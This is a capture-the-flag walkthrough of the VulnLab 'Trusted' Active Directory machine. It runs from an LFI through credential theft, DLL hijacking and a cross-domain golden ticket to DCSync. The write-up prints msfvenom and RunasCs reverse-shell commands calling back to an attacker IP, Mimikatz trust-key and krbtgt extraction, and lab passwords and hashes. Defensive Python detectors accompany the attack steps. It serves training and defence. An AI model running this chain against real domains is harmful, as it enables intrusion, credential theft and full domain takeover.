VL-Trusted

Vulnlab Trusted: Exploiting Domain Trust Relationships in Active Directory

In this detailed VulnLab walkthrough of the “Trusted” machine, we navigate through a sophisticated Active Directory environment to demonstrate how trust relationships between domains can be exploited. Starting with basic web enumeration that reveals a critical Local File Inclusion (LFI) vulnerability, we progressively escalate privileges by leveraging credential harvesting, Active Directory permissions abuse, and ultimately performing a domain trust attack. This step-by-step walkthrough showcases advanced Windows penetration testing techniques including DLL hijacking, Kerberos ticket manipulation, and DCSync attacks that cybersecurity professionals can apply to secure enterprise environments against similar vulnerabilities.

Initial Reconnaissance

Our initial port scan revealed several open ports and services on the target:

PORT      STATE SERVICE       REASON          VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Apache httpd 2.4.53
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-12 19:39:41Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows
389/tcp open ldap syn-ack ttl 127 Microsoft Windows
443/tcp open ssl/http syn-ack ttl 127 Apache httpd 2.4.53
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3306/tcp open mysql syn-ack ttl 127 MariaDB 5.5.5-10.4.24
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.4.24-MariaDB
| Thread ID: 9
| Capabilities flags: 63486
| Some Capabilities: SupportsTransactions, Support41Auth, FoundRows, Speaks41ProtocolNew, SupportsCompression, IgnoreSigpipes, DontAllowDatabaseTableColumn, LongColumnFlag, InteractiveClient, SupportsLoadDataLocal, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, ODBCClient, Speaks41ProtocolOld, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: V7M]l*(*:'O="/g<2%a:
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal
| rdp-ntlm-info:
| Target_Name: LAB
| NetBIOS_Domain_Name: LAB
| NetBIOS_Computer_Name: LABDC
| DNS_Domain_Name: lab.trusted.vl
| DNS_Computer_Name: labdc.lab.trusted.vl
| DNS_Tree_Name: trusted.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-04-12T19:40:41+00:00
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows
49678/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49687/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
57941/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
58459/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC

Web Enumeration

The target is running a web server on port 80. I used feroxbuster to discover hidden directories:

feroxbuster -u http://10.10.213.214/

This revealed a /dev directory:

301      GET        9l       30w      336c http://10.10.213.214/dev => http://10.10.213.214/dev/

[Screenshot: Xamoo Homepage]
[Screenshot: Manes Winchester Page]

Exploiting Local File Inclusion (LFI)

Testing for LFI vulnerability:

http://10.10.213.214/dev/index.html?view=../

[Screenshot: Unsecure File Query]

Confirming the LFI vulnerability by accessing Windows system files:

http://10.10.213.214/dev/index.html?view=../../../../../../windows/win.ini

[Screenshot: LFI Vulnerability Confirmed]

Using ffuf to enumerate potential files via LFI:

ffuf -u "http://10.10.213.214/dev/index.html?view=FUZZ" -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -e .php,.txt,.log,.ini -fl 35,33,40

[Screenshot: DB File Found]

To extract the contents of the PHP file, I used a base64 filter:

http://10.10.213.214/dev/index.html?view=php://filter/read=convert.base64-encode/resource=db.php

[Screenshot: MongoDB Password]
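
As an added defensive example (not part of the original walkthrough), the following Python script flags requests like the three above in an Apache access log: it URL-decodes each query value and reports traversal sequences, PHP stream wrappers such as php://filter, and absolute paths. The log lines are constructed to mirror the requests made against the view parameter.

```python
import re
from typing import List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log lines mirroring this section's requests (not real traffic).
SAMPLE_LOG = """\
10.8.5.195 - - [12/Apr/2025:19:45:01 +0000] "GET /dev/index.html?view=about.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.8.5.195 - - [12/Apr/2025:19:45:09 +0000] "GET /dev/index.html?view=../ HTTP/1.1" 200 336 "-" "Mozilla/5.0"
10.8.5.195 - - [12/Apr/2025:19:45:20 +0000] "GET /dev/index.html?view=..%2F..%2F..%2Fwindows%2Fwin.ini HTTP/1.1" 200 92 "-" "curl/8.0"
10.8.5.195 - - [12/Apr/2025:19:46:02 +0000] "GET /dev/index.html?view=php://filter/read=convert.base64-encode/resource=db.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
10.8.5.195 - - [12/Apr/2025:19:46:30 +0000] "GET /index.html HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(  # client IP, timestamp, method, request target and status
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')                        # ../ or ..\ segments
WRAPPER_RE = re.compile(r'^(php|file|data|expect|zip|phar|glob)://', re.I)  # PHP stream wrappers
ABSOLUTE_RE = re.compile(r'^([a-zA-Z]:[\\/]|[\\/])')                         # C:\..., /etc/..., \\host\...

def classify_value(value: str) -> Optional[str]:
    """Return the indicator type for one query value, or None if it looks benign."""
    decoded = unquote(unquote(value))  # second pass catches double encoding such as %252e%252e
    if WRAPPER_RE.search(decoded):
        return "stream-wrapper"
    if TRAVERSAL_RE.search(decoded):
        return "traversal"
    if ABSOLUTE_RE.search(decoded):
        return "absolute-path"
    return None

def find_lfi_attempts(log_text: str) -> List[dict]:
    """Parse each log line and report query parameters whose values look like file inclusion."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for param, values in query.items():
            for value in values:
                kind = classify_value(value)
                if kind:
                    hits.append({"time": m["ts"], "ip": m["ip"], "param": param,
                                 "value": value, "kind": kind, "status": int(m["status"])})
    return hits

if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} {hit["kind"]:<15} {hit["param"]}={hit["value"]} -> {hit["status"]}')
```

A 200 status on a flagged request (as in the win.ini and db.php lines) is the signal that the inclusion actually succeeded, so sort alerts by status before anything else.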

Database Enumeration

After decoding the base64 output, I obtained MySQL credentials:

root : SuperSecureMySQLPassw0rd1337.

Connecting to the MySQL server:

mysql -h 10.10.213.214 -u root -p --skip-ssl

Enumerated the databases and tables:

SHOW DATABASES;
USE news;
SHOW TABLES;
SELECT * FROM users;

Retrieved user credentials:

+----+------------+--------------+-----------+----------------------------------+
| id | first_name | short_handle | last_name | password                         |
+----+------------+--------------+-----------+----------------------------------+
|  1 | Robert     | rsmith       | Smith     | 7e7abb54bbef42f0fbfa3007b368def7 |
|  2 | Eric       | ewalters     | Walters   | d6e81aeb4df9325b502a02f11043e0ad |
|  3 | Christine  | cpowers      | Powers    | e3d3eb0f46fe5d75eed8d11d54045a60 |
+----+------------+--------------+-----------+----------------------------------+

After cracking the hashes:

rsmith : IHateEric2

SMB Enumeration

Checked for accessible SMB shares with the credentials:

netexec smb 10.10.213.214 -u rsmith -p <PASS> --shares

[Screenshot: RSmith Shares]

Other user accounts identified:

ewalters
cpowers

No valuable content was found on the accessible shares.

Active Directory Enumeration with BloodHound

Used BloodHound to map the domain:

netexec ldap 10.10.213.214 -u rsmith -p IHateEric2 --bloodhound --dns-server 10.10.213.214 -c ALL --dns-tcp

BloodHound revealed a bidirectional domain trust between trusted.vl and lab.trusted.vl:

[Screenshot: Cross Domain Trust]

It also showed that rsmith has ForceChangePassword rights over ewalters:

[Screenshot: Attack Path]

Lateral Movement

Exploiting the ForceChangePassword right to gain access as ewalters:

bloodyAD --host "labdc.lab.trusted.vl" -d "lab.trusted.vl" -u "rsmith" -p "<PASS>" set password "ewalters" "HelloWorld123@"

Connecting with the new credentials:

evil-winrm -i labdc.lab.trusted.vl -u ewalters -p HelloWorld123@

In the C:\AVTest directory, found an interesting readme:

type readme.txt
Since none of the AV Tools we tried here in the lab satisfied our needs it's time to clean them up.
I asked Christine to run them a few times, just to be sure.

Let's just hope we don't have to set this lab up again because of this.

DLL Hijacking

Transferred KasperskyRemovalTool.exe to my attacking machine for analysis.

On Linux, start an SMB share to receive the file:

impacket-smbserver smb /mnt -smb2support

On Windows:

copy .\KasperskyRemovalTool.exe \\10.8.5.195\smb\KasperskyRemovalTool.exe

Analyzed the executable with Process Monitor to identify DLL hijacking opportunities:

Set up filters for:

  1. Process Name
  2. Path containing .dll
  3. Result containing “NAME NOT FOUND”

[Screenshot: Filter Name]
[Screenshot: DLL Filter]
[Screenshot: Final Filter]

Process Monitor revealed that the executable attempts to load a DLL named KasperskyRemovalToolENU.dll from the current directory:

[Screenshot: DLL Injection Opportunity]

Created a malicious DLL with the same name containing a reverse shell:

msfvenom -p windows/shell_reverse_tcp LHOST=10.8.5.195 LPORT=4444 -f dll > KasperskyRemovalToolENU.dll

Set up SMB server to transfer the file:

impacket-smbserver smb /mnt -smb2support

Copied the malicious DLL to the target:

copy \\10.8.5.195\smb\KasperskyRemovalToolENU.dll .\KasperskyRemovalToolENU.dll

After executing the Kaspersky tool, received a reverse shell:
[Screenshot: Got Shell]
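
A defender's counterpart to the Process Monitor analysis, added here and not part of the original walkthrough: a Python check over Sysmon Event ID 7 (ImageLoaded) records that flags an unsigned DLL loaded from the process's own user-writable directory, which is exactly what the planted KasperskyRemovalToolENU.dll looks like at load time. The events, the vendor_ui.dll name and the list of writable directories are constructed for this lab.

```python
import ntpath
from typing import Dict, List

# Loads from these locations are the normal case and are never flagged.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")
# Directories a non-admin user can write to in this lab (an assumption for this example).
USER_WRITABLE_DIRS = ("c:\\avtest\\", "c:\\users\\", "c:\\temp\\")

# Constructed Sysmon Event ID 7 records; only the fields the check needs are included.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 7, "Image": "C:\\AVTest\\KasperskyRemovalTool.exe",
     "ImageLoaded": "C:\\Windows\\System32\\kernel32.dll", "Signed": "true", "SignatureStatus": "Valid"},
    {"EventID": 7, "Image": "C:\\AVTest\\KasperskyRemovalTool.exe",
     "ImageLoaded": "C:\\AVTest\\KasperskyRemovalToolENU.dll", "Signed": "false", "SignatureStatus": "Unavailable"},
    {"EventID": 7, "Image": "C:\\AVTest\\KasperskyRemovalTool.exe",  # hypothetical signed companion DLL
     "ImageLoaded": "C:\\AVTest\\vendor_ui.dll", "Signed": "true", "SignatureStatus": "Valid"},
]

def hijack_suspects(events: List[Dict]) -> List[Dict]:
    """Return ImageLoaded events matching the side-load pattern: the DLL sits in the
    process's own directory, that directory is user-writable, and the DLL is unsigned."""
    suspects = []
    for ev in events:
        if ev.get("EventID") != 7:
            continue
        dll = ev["ImageLoaded"].lower()
        if dll.startswith(SYSTEM_DIRS):
            continue
        exe_dir = ntpath.dirname(ev["Image"]).lower() + "\\"
        same_dir = ntpath.dirname(dll) + "\\" == exe_dir
        writable = dll.startswith(USER_WRITABLE_DIRS)
        signed = ev.get("Signed", "false").lower() == "true" and ev.get("SignatureStatus") == "Valid"
        if same_dir and writable and not signed:
            suspects.append({"process": ev["Image"], "dll": ev["ImageLoaded"],
                             "reason": "unsigned DLL loaded from user-writable application directory"})
    return suspects

if __name__ == "__main__":
    for s in hijack_suspects(SAMPLE_EVENTS):
        print(f'{s["process"]} loaded {s["dll"]}: {s["reason"]}')
```

Legitimate unsigned side-by-side DLLs will also match, so baseline known hashes; a freshly dropped DLL whose hash has never been seen next to that executable is still the case worth paging on.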

Privilege Escalation via Domain Trust Abuse

Uploaded Mimikatz to map the domain trust and forge a golden ticket:

privilege::debug
lsadump::trust /patch

[Screenshot: Domain Trust]

Extracted the krbtgt hash:

lsadump::dcsync /domain:lab.trusted.vl /all

[Screenshot: KRBTGT Hash]

Gathered the following information:

  1. LAB.TRUSTED.VL domain SID: S-1-5-21-2241985869-2159962460-1278545866
  2. TRUSTED.VL domain SID: S-1-5-21-3576695518-347000760-3731839591, with RID 519 (Enterprise Admins) appended as the ticket's extra SID
  3. krbtgt hash (NT hash, used as /rc4): c7a03c565c68c6fac5f8913fab576ebd

Created a golden ticket to exploit the trust relationship:

kerberos::golden /user:Administrator /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /rc4:c7a03c565c68c6fac5f8913fab576ebd /service:krbtgt /target:trusted.vl /ticket:trustkey.kirbi /ptt
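
What stops the /sids trick on a hardened trust is SID filtering. This added Python example (not from the original walkthrough) models the quarantine rule, which discards ExtraSids that do not belong to the domain that issued the ticket, and shows that with quarantine off (the default for a parent/child trust inside one forest) the Enterprise Admins SID passes straight through; the two domain SIDs are the ones listed above.

```python
from typing import Dict, List, Tuple

# Domain SIDs from the walkthrough.
LAB_SID = "S-1-5-21-2241985869-2159962460-1278545866"     # lab.trusted.vl, the domain issuing the ticket
TRUSTED_SID = "S-1-5-21-3576695518-347000760-3731839591"  # trusted.vl, the forest root

# Well-known RIDs whose appearance in SID History / ExtraSids is a high-severity finding.
PRIVILEGED_RIDS = {500: "Administrator", 512: "Domain Admins", 516: "Domain Controllers",
                   518: "Schema Admins", 519: "Enterprise Admins"}

def domain_of(sid: str) -> str:
    """Domain identifier of an account SID (everything before the final RID)."""
    return sid.rsplit("-", 1)[0]

def rid_of(sid: str) -> int:
    """Relative identifier (last component) of an account SID."""
    return int(sid.rsplit("-", 1)[1])

def sid_filter(issuer_domain_sid: str, extra_sids: List[str], quarantined: bool) -> Tuple[List[str], List[str]]:
    """Split ExtraSids into (accepted, dropped) as the trusting domain would.

    With quarantine on, only SIDs from the issuing domain survive; with it off
    (the default for parent/child trusts inside one forest) everything passes."""
    accepted, dropped = [], []
    for sid in extra_sids:
        if quarantined and domain_of(sid) != issuer_domain_sid:
            dropped.append(sid)
        else:
            accepted.append(sid)
    return accepted, dropped

def privileged_findings(extra_sids: List[str]) -> Dict[str, str]:
    """Map each ExtraSid that carries a privileged well-known RID to its group name."""
    return {sid: PRIVILEGED_RIDS[rid_of(sid)] for sid in extra_sids if rid_of(sid) in PRIVILEGED_RIDS}

if __name__ == "__main__":
    injected = [TRUSTED_SID + "-519"]  # the /sids value used in the golden ticket above
    for quarantined in (False, True):
        accepted, dropped = sid_filter(LAB_SID, injected, quarantined)
        print(f"quarantine={quarantined}: accepted={accepted} dropped={dropped}")
    print("privileged ExtraSids:", privileged_findings(injected))
```

Inside one forest the child domain already sits within the security boundary, so quarantine is shown here to illustrate the rule rather than as a recommended setting on an intra-forest trust; the structural defence is protecting the child's krbtgt secret as carefully as the root's.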

Performed a DCSync attack to extract all domain credentials:

lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all

[Screenshot: Trusted Admin]
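
Both DCSync runs above (against lab.trusted.vl and then trusted.vl) leave Security Event ID 4662 records on the domain controller that granted the replication control-access rights. This added Python example (not part of the original walkthrough) flags 4662 events in which those rights are exercised by anything other than a domain-controller computer account; the events are constructed, the jdoe account is hypothetical, and the replication and ForceChangePassword GUIDs are the real schema values.

```python
from typing import Dict, List

# Control-access-right GUIDs that directory replication (and therefore DCSync) requires.
REPLICATION_RIGHTS = {
    "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}": "DS-Replication-Get-Changes",
    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}": "DS-Replication-Get-Changes-All",
    "{89e95b76-444d-4c62-991a-0facbeda640c}": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Principals expected to replicate: the DC computer accounts of both domains.
KNOWN_DC_ACCOUNTS = {"LAB\\LABDC$", "TRUSTED\\TRUSTEDDC$"}

# Constructed Security log 4662 records with only the fields the check needs (jdoe is hypothetical).
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 4662, "Computer": "labdc.lab.trusted.vl", "SubjectDomainName": "LAB", "SubjectUserName": "LABDC$",
     "AccessMask": "0x100", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "Computer": "labdc.lab.trusted.vl", "SubjectDomainName": "LAB", "SubjectUserName": "jdoe",
     "AccessMask": "0x100", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "trusteddc.trusted.vl", "SubjectDomainName": "LAB", "SubjectUserName": "Administrator",
     "AccessMask": "0x100", "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "Computer": "labdc.lab.trusted.vl", "SubjectDomainName": "LAB", "SubjectUserName": "rsmith",
     "AccessMask": "0x100", "Properties": "{00299570-246d-11d0-a768-00aa006e0529}"},  # User-Force-Change-Password
]

def dcsync_alerts(events: List[Dict]) -> List[Dict]:
    """Return 4662 events in which a non-DC principal exercised a replication right."""
    dc_accounts = {a.upper() for a in KNOWN_DC_ACCOUNTS}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662 or not int(ev.get("AccessMask", "0"), 16) & 0x100:
            continue  # 0x100 = control access; replication rights are extended rights
        rights = [REPLICATION_RIGHTS[g] for g in ev.get("Properties", "").split() if g in REPLICATION_RIGHTS]
        if not rights:
            continue  # some other extended right, e.g. a password reset
        subject = f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}'
        if subject.upper() in dc_accounts:
            continue  # routine DC-to-DC replication
        alerts.append({"computer": ev["Computer"], "subject": subject, "rights": rights})
    return alerts

if __name__ == "__main__":
    for a in dcsync_alerts(SAMPLE_EVENTS):
        print(f'{a["computer"]}: {a["subject"]} exercised {", ".join(a["rights"])}')
```

The third record is what the forged ticket above would produce on trusteddc: a LAB\Administrator principal replicating the root domain, which is flagged regardless of the account name because replication should only ever come from DC accounts.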

Final Privilege Escalation

Since we couldn’t directly access the root.txt file without administrator context, we changed the Administrator password and used RunasCs to get a shell with administrative privileges:

net user Administrator HelloWorld123@
./RunasCs.exe Administrator 'HelloWorld123@' cmd.exe -r '10.8.5.195:443'

This provided us with full administrative access to the domain, completing the penetration test.
[Screenshot: Vulnlab Cert]